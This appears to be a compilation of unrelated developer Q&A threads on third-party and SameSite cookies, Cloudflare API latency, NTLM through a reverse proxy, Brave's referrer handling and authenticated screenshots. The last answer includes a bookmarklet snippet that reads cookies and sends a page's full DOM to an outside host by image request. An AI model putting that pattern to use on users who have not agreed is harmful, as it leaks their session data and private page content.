Third Party Cookies - Cross Domain APIs w/ Session Tracking

Given a CORS API that requires a session cookie to track users as they move through a checkout process, there are issues in multiple browsers where the cookie is not set until after the user visits the site the API is hosted on.
For example: johnny.com uses a CORS JSON API from jacob.com. jacob.com sets a cookie after the first AJAX call is made, but some browsers will not set the cookie for subsequent calls. Therefore the API will not function as expected.
Browser Behavior:
Chrome seems to function fine unless "Third-Party cookies" are deliberately disabled. There doesn't seem to be a workaround for this.
IE does not allow the cookie to be set initially unless there is a P3P privacy policy header returned with the initial call.
Safari does not allow the cookie to be set initially unless a hack is used (see: http://measurablewins.gregjxn.com/2014/02/safari-setting-third-party-iframe.html)
Any insight on how to work around these issues is greatly appreciated.

Unfortunately, it seems there is no option to make that work across all browsers.
Safari now restricts third-party use of cookies.
It seems the best is to evaluate alternatives:
Set up a proxy server that will redirect the calls to the different services (for example, when you hit johnny.com/jacob/abc, act as a proxy to retrieve jacob.com/abc)
Use OAuth login on the API (it might be impractical)
Move the API under johnny.com/api/...
PayPal has also created several JS-based solutions to try to get around this kind of problem: https://medium.com/@bluepnume/introducing-paypals-open-source-cross-domain-javascript-suite-95f991b2731d

Cloudflare adds too much latency to API calls

Trying out Cloudflare for DDoS protection of an SPA web app, using the free tier for testing.
Static content loading is fine, but API calls became very slow.
From originally <50ms for each API call to around 450~500ms each.
My APIs are called via a subdomain, e.g. apiXXX.mydomain.xyz
Any idea of the problem, or an alternative fast DDoS protection solution?
Cloudflare has created a page to explain the configuration you have to do when proxying APIs:
You have to create a new Page Rule in which you bypass cache and turn off the Always Online and Browser Integrity Check options.
If you do not configure this, you may have slow response times because all those options are enabled by default on API calls.
Here's the link to create the configuration: Cloudflare Page Rule for API

Login by token in URL setting a SameSite session

We have a register page on DomainA.com, which, after successful registration, shows a page with a JavaScript redirect to our application App.DomainB.com/direct-login/{login-token}. This has worked for a long time, until we wanted to use SameSite session cookies. With 'Strict' this won't work at all, so we decided to use 'Lax'.
Sadly 'Lax' also did not work. We found out that a back-end redirect (Location: App.DomainB.com/direct-login/token) did do the trick, but we have some Google Analytics events in the front-end of the DomainA.com response. I am not sure if we could move those GA events to App.DomainB.com, but we would rather not if at all possible.
Another "trick" we tried was creating a back-end redirect controller in DomainA.com, and when the registration was successful, it would show the JavaScript redirect, but this time redirect to DomainA.com/redirect/token. Sadly trying to trick the browser had no success.
My question is how we could make the redirect from DomainA.com to the direct login URL on App.DomainB.com, where App.DomainB.com sets a session cookie with the SameSite attribute (e.g. Strict or Lax). Hopefully while keeping the GA events on DomainA.com.
If you guys have more questions, I'm happy to elaborate. Code snippets are possible if required.
TL;DR: It seems that setting a SameSite cookie when being redirected (via a client-side redirect) from another origin is blocked by most, if not all, browsers. Is there any way to set the SameSite cookie after being redirected from another origin?
EDIT: It turns out, SameSite=Lax does fix the problem.
I think I didn't test it carefully enough, but it turns out that the first fix, using SameSite=Lax actually does fix the problem. The cross origin redirect is being made and the session cookie is set.
It only fails to set the session cookie when using SameSite=Strict.
I hope this answer will help other people with a similar problem.
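As an added example (not from the question or its author), a small JavaScript model of the rule behind that finding: whether a browser attaches a SameSite cookie to a request. domaina.com and app.domainb.com stand in for the question's placeholders; registrableDomain() and the treatment of the redirect hop are simplifying assumptions stated in the comments.

```javascript
// Naive eTLD+1 (last two labels). Real browsers consult the Public Suffix List;
// this simplification is an assumption of the model.
function registrableDomain(host) {
  return host.toLowerCase().split('.').slice(-2).join('.');
}

// DomainB.com and App.DomainB.com are the same site; DomainA.com is cross-site to both.
function isSameSite(initiatorHost, targetHost) {
  return registrableDomain(initiatorHost) === registrableDomain(targetHost);
}

const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS', 'TRACE']);

// Would the browser attach this cookie to the request?
// req:    { initiatorHost, targetHost, method, topLevelNavigation }
// cookie: { sameSite: 'Strict' | 'Lax' | 'None', secure: boolean }
function cookieAttached(req, cookie) {
  if (isSameSite(req.initiatorHost, req.targetHost)) return true;
  switch (cookie.sameSite) {
    case 'Strict': return false;   // never on a cross-site request, even a top-level navigation
    case 'Lax':    return req.topLevelNavigation === true && SAFE_METHODS.has(req.method.toUpperCase());
    case 'None':   return cookie.secure === true;   // Secure is required; Safari may still block it
    default:       return false;
  }
}

// The question's flow: a JavaScript redirect from DomainA.com lands on
// App.DomainB.com/direct-login/{token}, which sets the session cookie and (assumed
// here) answers with a Location redirect into the app. The model treats that redirect
// hop as still initiated cross-site, so a Strict cookie is not attached and the login
// looks as if it never happened, while a Lax cookie rides along on the GET navigation.
function directLoginScenario(sameSite) {
  const cookie = { sameSite, secure: true };
  const landing = { initiatorHost: 'domaina.com', targetHost: 'app.domainb.com', method: 'GET', topLevelNavigation: true };
  const redirectHop = { ...landing };                                  // chain still started on DomainA.com
  const laterClick = { ...landing, initiatorHost: 'app.domainb.com' }; // a later link inside the app
  return {
    afterRedirect: cookieAttached(redirectHop, cookie),
    laterSameSite: cookieAttached(laterClick, cookie),
  };
}
```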

Windows Authentication issue with .Net Reverse Proxy using IIS custom HTTP module

We use a custom HTTP module in IIS as a reverse proxy for web applications. Generally this works well and has done for some time, but we've come across an issue with Windows Authentication (WA). We're using IE 11, IIS 10 and Server 2016.
When accessing the target site directly, WA works fine - we get a browser login dialog when the initial HTML page is requested and the subsequent requests (CSS, JS, etc) go through fine.
When accessing via our proxy, the same (correct behaviour) happens for the initial html page, the first CSS/JS request authenticates ok too, but the subsequent ones cause a browser login to popup.
What seems to happen on the 'bad' requests (i.e. those that cause the login dialog) is:
1) Browser decides it needs to authenticate, so sends an Authorization header (Negotiate, with an NTLM token)
2) Server responds (401) with a WWW-Authenticate: Negotiate response with a full NTLM token
3) Browser re-requests with an Authorization header (Negotiate, with a full NTLM token)
4) Server responds (401) with a WWW-Authenticate: Negotiate (with no token), which causes the browser to show the login dialog
5) With login credentials entered, Browser sends the same request as in (1) - identical NTLM token, server responds as in (2), Browser re-requests as in (3), but this time it works!
We've set up a test web site with one html page, requesting 3 JS and 2 CSS files to replicate this. On our test server we've got two sites, one using our reverse proxy and one using ARR. The ARR site works fine. Also, since step (5) above works, we believe that the proxy pass-through is fundamentally working, i.e. NTLM tokens are not being messed up by dodgy encoding, etc.
One thing that does work is that if we use Fiddler and put breakpoints on each request, we're able to hold back the 5 sub-requests (JS & CSS files), letting one go through at a time. If we let each sequence (i.e. NTLM token exchange for each URL/file, through to the 200 response) complete, then it works. This made us think that there is some interleaving effect (e.g. shared memory corruption) in our proxy; this is still a possibility.
So, we put code at the start of BeginRequest and end of EndRequest with a Synclock and a shared var to store the Path (AppRelativeCurrentExecutionFilePath). This was for our code to 'Single Thread' each of these request/exchanges. This does what we expected, i.e. only allowing one auth exchange to happen and resulting in a 200 before allowing the next. However, we still have the same problem of the server rejecting the first exchange. So, does this indicate something happening in/before BeginRequest, where if we hold the requests back in Fiddler then they work, but not if we do it in our http module?
Or is there some sort of timing issue where the manual breakpoints in Fiddler also mean we’re doing it at ‘human’ speed and therefore allowing things to work better?
One difference we can see is the 'Connection: Keep-Alive' header. That header is in the request from the browser to our proxy site, but not passed from our proxy to the base site, yet the ARR site does pass that through... It's all using HTTP 1.1 and so we can't find a way to set Keep-Alive on our outgoing request - could this be it?
Regarding 'things to try', we think we've eliminated things like having the site in the Intranet Zone for IE by having the ARR site work ok, and having the same IE settings for that site. Clearly, something is not right, so we could have missed something here!
In short, we've been working on this for days, and have tried most of what we can find on SO and elsewhere, but can't figure out what the heck is going on.
Any suggestions - let me know if you want any further info. All help will be very gratefully received!

Brave browser support of Google API HTTP Referrer option

I'm using a Google API (e.g., for Maps Embed) with a key that is restricted via a list of HTTP Referrers. In this case, the map is embedded in my.site.com, so within the Google API -> Credentials page, I allow access for referrer .site.com/. When I visit my.site.com from most browsers, Google maps displays correctly as the browser sets the referrer field to my.site.com. When using the Brave browser, however, it sets the referrer field to the origin and displays an error:
Request received from IP address 98.229.177.122, with referrer: https://www.google.com/
Of course I could add google.com to the list of allowed referrers, but that defeats the purpose of limiting the use of the API key to my own website - anyone could "borrow" the API key, add it to their site for the same API, and anyone using Brave would be able to access the feature. Now that each access costs $, I'd rather not do this. Any ideas for a work-around?
Note: @geocodezip - thanks for the reference. Indeed, I forgot to add that when I set the site-specific shield to "All cookies allowed", or even completely turn shields off for the site, the behavior is still the same (error). However, in the default shield settings, when I set the cookies field to "All cookies allowed", then it works as intended (maps are displayed), even though for the default settings section it states:
These are the default Shields settings. They apply to all websites
unless you change something in the Shields panel on a particular site.
Changing these won't affect your existing per-site settings.
which I interpret to mean that the site-specific settings take precedence over the defaults.
So I'm thinking this (site-specific cookies setting not over-riding the default) is a brave bug, though that is a bit separate from my initial hope for a different approach that didn't require manual intervention on the user's part.

Problem with web screenshots requiring authentication

I am making an app that takes a screenshot of a URL requested by the user. I want to make it as transparent as possible when sites that require a username and password are in question.
For instance, if a user wants to screenshot his iGoogle page, he will send the server the URL, but the screenshot will not be the same as what he sees on his screen.
Is there any way to do this? I guess that in such cases I will have to actually request the screenshot from the user. Perhaps the user can even deliver me his cookie for that domain.
Any thoughts?
Ty.
Yes, in most cases you'll need the user's cookies.
If the site uses regular cookies, you can create a bookmarklet that reads document.cookie. This will not work with httpOnly cookies, which are used increasingly often for sessions.
Some sites limit sessions to a certain IP, and in that case you can't take a screenshot without proxying the request through the user's computer.
If you can get the user to use a bookmarklet, an interesting trick would be to read and send the DOM to your server:
var image = new Image();
image.src = 'http://example.com/?source=' +
    encodeURIComponent(document.documentElement.innerHTML); // escape() is deprecated; encodeURIComponent encodes UTF-8 correctly
For HTTP authentication the easiest solution would be to ask the user for login/password.